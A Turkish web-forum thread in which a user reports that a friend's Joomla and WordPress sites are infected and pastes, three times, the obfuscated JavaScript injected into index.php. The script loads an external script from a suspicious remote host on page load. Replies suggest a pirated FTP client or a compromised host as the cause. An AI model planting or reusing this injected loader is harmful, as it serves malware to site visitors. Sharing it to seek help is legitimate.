bir arkadaşımın (gerçekten:)site(leri)ne virüs bulaşmış. joomla ve wp kullanıyor. index.phpnin son satırında aşağıdaki kod varmış. dosyayı değiştirse bile aynı kod otomatik olarak ekleniyormış. virüs programları alarm veriyor. bazı siteler hata verip hiç açolmıyor. kod şöyle: <script>/*GNU GPL*/ try{window.onload = function(){var F5nztaz4ldtv = document.createElement('s((^c)r^@i@!(#p)!$#t))$'.replace(/\(|#|\!|@|\^|&|\)|\$/ig, ''));F5nztaz4ldtv.setAttribute('type', 'text/javascript');F5nztaz4ldtv.setAttribute('src', 'h(t#t!($p^#!@:^&$/$&/^i@)#n&!f!$o)&r!&#(&m^$^@e!r&-$#)c#^o((m)@&.!g^o!))o$g&))&l$$&&$e^)#.&(c($z^&$.^!s)@t&(u^#&m)!!#b#^)#l&)!e$u&p^$!o!!n@-)@c)^)#^o))m#&(.#(@w$o&r^@!&l&(d$$!!h!#^#i&g!)^h$@s^$p$$@$e$e(&d@().#$r^(u@:&$^8#^)$0!!!8&0$^!/&)!t#(a#&g^g&(e&)d^$.((&c!(##!o#^!$m^/&&t!@!a$&g#&g!^)#&e#)d$^^(.&@c#!!o$$)m#!/^)&g@&o@@^$o^&g($$l^@@e(&^^.(##c(!o^(m#&^&(.()!v$#@!n^!/$p@!a^^&s^s$)p(^^o$r^t$&(#.&!&$n!(e^t@)/^$g@o^($&)o#&@g^$!l&^&e!#@^.@!)c@#!)o@^(m$($/&)&'.replace(/&|\)|#|\^|\!|\$|@|\(/ig, ''));F5nztaz4ldtv.setAttribute('defer', 'defer');F5nztaz4ldtv.setAttribute('id', 'M)$z$(n(#)&o&#(&&t@q((##l((q!)t@6#p!@!#$'.replace(/@|\(|#|\!|\^|\)|&|\$/ig, ''));document.body.appendChild(F5nztaz4ldtv);}} catch(e) {}</script><!-- 1262110161 -->
<script>/*GNU GPL*/ try{window.onload = function(){var F5nztaz4ldtv = document.createElement('s((^c)r^@i@!(#p)!$#t))$'.replace(/\(|#|\!|@|\^|&|\)|\$/ig, ''));F5nztaz4ldtv.setAttribute('type', 'text/javascript');F5nztaz4ldtv.setAttribute('src', 'h(t#t!($p^#!@:^&$/$&/^i@)#n&!f!$o)&r!&#(&m^$^@e!r&-$#)c#^o((m)@&.!g^o!))o$g&))&l$$&&$e^)#.&(c($z^&$.^!s)@t&(u^#&m)!!#b#^)#l&)!e$u&p^$!o!!n@-)@c)^)#^o))m#&(.#(@w$o&r^@!&l&(d$$!!h!#^#i&g!)^h$@s^$p$$@$e$e(&d@().#$r^(u@:&$^8#^)$0!!!8&0$^!/&)!t#(a#&g^g&(e&)d^$.((&c!(##!o#^!$m^/&&t!@!a$&g#&g!^)#&e#)d$^^(.&@c#!!o$$)m#!/^)&g@&o@@^$o^&g($$l^@@e(&^^.(##c(!o^(m#&^&(.()!v$#@!n^!/$p@!a^^&s^s$)p(^^o$r^t$&(#.&!&$n!(e^t@)/^$g@o^($&)o#&@g^$!l&^&e!#@^.@!)c@#!)o@^(m$($/&)&'.replace(/&|\)|#|\^|\!|\$|@|\(/ig, ''));F5nztaz4ldtv.setAttribute('defer', 'defer');F5nztaz4ldtv.setAttribute('id', 'M)$z$(n(#)&o&#(&&t@q((##l((q!)t@6#p!@!#$'.replace(/@|\(|#|\!|\^|\)|&|\$/ig, ''));document.body.appendChild(F5nztaz4ldtv);}} catch(e) {}</script>
yardımlarınızı bekliyoruz.
<script>/*GNU GPL*/ try{window.onload = function(){var F5nztaz4ldtv = document.createElement('s((^c)r^@i@!(#p)!$#t))$'.replace(/\(|#|\!|@|\^|&|\)|\$/ig, ''));F5nztaz4ldtv.setAttribute('type', 'text/javascript');F5nztaz4ldtv.setAttribute('src', 'h(t#t!($p^#!@:^&$/$&/^i@)#n&!f!$o)&r!&#(&m^$^@e!r&-$#)c#^o((m)@&.!g^o!))o$g&))&l$$&&$e^)#.&(c($z^&$.^!s)@t&(u^#&m)!!#b#^)#l&)!e$u&p^$!o!!n@-)@c)^)#^o))m#&(.#(@w$o&r^@!&l&(d$$!!h!#^#i&g!)^h$@s^$p$$@$e$e(&d@().#$r^(u@:&$^8#^)$0!!!8&0$^!/&)!t#(a#&g^g&(e&)d^$.((&c!(##!o#^!$m^/&&t!@!a$&g#&g!^)#&e#)d$^^(.&@c#!!o$$)m#!/^)&g@&o@@^$o^&g($$l^@@e(&^^.(##c(!o^(m#&^&(.()!v$#@!n^!/$p@!a^^&s^s$)p(^^o$r^t$&(#.&!&$n!(e^t@)/^$g@o^($&)o#&@g^$!l&^&e!#@^.@!)c@#!)o@^(m$($/&)&'.replace(/&|\)|#|\^|\!|\$|@|\(/ig, ''));F5nztaz4ldtv.setAttribute('defer', 'defer');F5nztaz4ldtv.setAttribute('id', 'M)$z$(n(#)&o&#(&&t@q((##l((q!)t@6#p!@!#$'.replace(/@|\(|#|\!|\^|\)|&|\$/ig, ''));document.body.appendChild(F5nztaz4ldtv);}} catch(e) {}</script>
yardımlarınızı bekliyoruz.
iframe virüsü var bu sıralar ortalıkta gezinen. benzer bir virüs olabilir.
alkolik imam
şu sıralarda çok geziniyor evet, iki ihtimal var aklıma gelen;
* kullandığın ftp programı "warez" ve içinde böyle bir şey var,
* hosting hizmeti aldığın sunucu virusu yemiş
efendy
abi şöyle çözülüyormuş, böyle çözülüyormuş değil. götümü yırttım 15 gün bu virtuemart için. hostu değiştirdik sorun çözüldü. hiç uğraşmaya gerek yok, çözüm virus yemiş hostu değiştirmekte.
uckac
1